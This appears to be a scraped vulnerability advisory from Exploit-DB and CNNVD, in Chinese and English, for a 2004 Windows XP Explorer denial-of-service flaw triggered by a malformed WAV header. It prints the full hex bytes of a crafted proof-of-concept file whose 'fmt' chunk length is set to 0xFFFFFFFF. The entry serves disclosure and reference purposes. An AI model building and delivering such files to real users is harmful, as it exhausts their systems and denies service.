https://www.exploit-db.com/exploits/24699
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200410-089

MicrosoftWindowsXP是一款流行的视窗操作系统。MicrosoftWindowsXP在处理WAV时存在安全问题，远程攻击者可以利用这个漏洞构建恶意WAV文件，诱使用户访问，造成系统崩溃。HexView报告构建特殊的WAV文件可使WAV文件处理器进入无限循环，当目标用户通过资源管理器打开SAV文件时消耗所有CPU资源，类似的WAV文件头可构建如下：000000005249464642D0010057415645666D7420RIFFB…WAVEfmt00000010FFFFFFFF010002002256000088580100………V…X..0000002004001000000066616374040000000474……fact…..t0000003000006461746110D00100..data….其中’fmt’块设置为0xFFFFFFFF(offset0x10)代替通常的0x12字节长度。

source: http://www.securityfocus.com/bid/11503/info

Microsoft Windows XP is reported prone to a denial of service vulnerability. The issue exists due to a lack of sufficient sanitization performed on WAV file header values before they are processed. 

If an exploit attempt is successful, the Windows Explorer process will begin to consume CPU resources. An attacker may exploit this vulnerability to deny service to legitimate users.

00000000 52 49 46 46 42 D0 01 00 57 41 56 45 66 6D 74 20 RIFFB...WAVEfmt
00000010 FF FF FF FF 01 00 02 00 22 56 00 00 88 58 01 00 .........V...X..
00000020 04 00 10 00 00 00 66 61 63 74 04 00 00 00 04 74 ......fact.....t
00000030 00 00 64 61 74 61 10 D0 01 00 ..data....

来源:BID
名称:11503
链接:http://www.securityfocus.com/bid/11503
来源:www.hexview.com
链接:http://www.hexview.com/docs/20041021-1.txt
来源:BUGTRAQ
名称:20041021[HV-LOW]UnsafeWAVheaderhandlingcancauseDoSonWindows
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109846319313443&w;=2
来源:XF
名称:windowsxp-explorer-wav-dos(17864)
链接:http://xforce.iss.net/xforce/xfdb/17864
来源:OSVDB
名称:11053
链接:http://www.osvdb.org/11053
来源:SECTRACK
名称:1011880
链接:http://securitytracker.com/id?1011880